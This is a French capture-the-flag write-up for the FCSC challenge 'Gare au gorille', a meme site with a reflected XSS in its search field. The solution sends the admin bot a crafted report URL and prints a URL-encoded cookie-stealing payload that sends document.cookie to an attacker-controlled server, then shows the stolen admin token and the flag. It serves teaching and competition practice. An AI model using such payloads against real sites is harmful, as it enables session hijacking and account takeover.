# Gare au gorille

J'ai construit un site sans prétention pour stocker ma collection de memes !

https://gare-au-gorille.france-cybersecurity-challenge.fr/


**Solution**

![wbesite](gareaugorille.png)

Ce que nous apporte la reconnaissance:
- on nous pousse un cookie `token` qui ressemble à du base64 ? Cela décode du binaire, en tout cas ce n'est pas un JWT.
- si on demande à ajouter un meme, on se fait jeter parce qu'on n'est pas admin (bad token).
- chaque meme a un bouton permettant de le signaler à l'administrateur.
- il n'y a pas de SQLi dans la recherche à priori. En revanche, il y a une XSS réfléchie (par le pattern de recherche).

On a suffisamment d'information pour poser l'hypothèse de compromission : on pourrait utiliser la XSS réfléchie dans un rapport à l'administrateur, en espérant par ce biais lui voler son cookie afin d'accéder à l'interface d'admin qui, on suppose, contient le flag.

Voyons si on peut faire venir l'admin sur un serveur que l'on maîtrise. On construit une URL de recherche qui va injecter une balise `<img>` pointant sur une URL que l'on maîtrise : `/?search=<img src="https://<my_web_server>/">`. Pour construire l'URL de signalement à partir de cela, il ne faut pas oublier d'URLcoder la première payload, ce qui va nous donner : `https://gare-au-gorille.france-cybersecurity-challenge.fr/report?url=/?search=%3Cimg%20src=%22https://<my_web_server>/%22%3E`

D'après les logs, l'admin vient !
```log
141.94.142.49 - - [29/Apr/2022:16:01:06 +0200] "GET /foo HTTP/1.1" 404 7084 "http://gare-au-gorille-www:2151/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/100.0.4863.0 Safari/537.36"
```

On va donc utiliser un voleur de cookie, en prêtant particulièrement attention aux encodages successifs :
https://gare-au-gorille.france-cybersecurity-challenge.fr/report?url=/?search=%3Cscript%3Edocument.write(%2527%3Cimg+src%253D%22https%253A%252F%252F<my_web_server>%252Ffoo%253Fc%253D%2527%252Bdocument.cookie%252B%2527%22+%252F%3E%2527)%253B%3C%252Fscript%3E

On récupère alors dans nos logs le cookie de l'admin :
```
"GET /foo?c=token=O9Mv3sFaQD1UpQRLCXVOCzCi0dRbpz4Wy4kGPngZt36MZnR6xZpbHLQRWfDi6T45 HTTP/1.1" 404 7084 "http://gare-au-gorille-www:2151/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/100.0.4863.0 Safari/537.36"
```

On remplace notre token par celui de l'admin, et on tente d'ajouter un meme :
```
Congrats! Here is the flag.
FCSC{14b15680de4e305b89eaa2a07b137abf4e39b5773f39a4ea7155ca5387c6f59e}
```
